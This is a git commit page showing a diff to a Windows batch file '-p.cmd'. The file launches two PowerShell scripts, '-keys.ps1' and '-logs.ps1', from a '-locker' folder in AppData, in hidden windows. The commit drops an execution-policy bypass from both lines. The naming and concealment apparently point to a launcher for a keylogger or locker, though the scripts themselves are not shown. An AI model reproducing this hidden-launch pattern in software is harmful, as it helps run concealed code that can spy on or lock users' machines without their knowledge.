Update -p.cmd
This commit is contained in:
parent
890c5b4e2a
commit
b9fdcf3ce2
1 changed files with 2 additions and 2 deletions
|
@ -1,3 +1,3 @@
|
||||||
@echo off
|
@echo off
|
||||||
powershell Start-Process powershell.exe -windowstyle hidden -ExecutionPolicy bypass "$env:appdata/-locker/-keys.ps1"
|
powershell Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-keys.ps1"
|
||||||
powershell Start-Process powershell.exe -windowstyle hidden -ExecutionPolicy bypass "$env:appdata/-locker/-logs.ps1"
|
powershell Start-Process powershell.exe -windowstyle hidden "$env:appdata/-locker/-logs.ps1"
|
||||||
|
|
Loading…
Reference in a new issue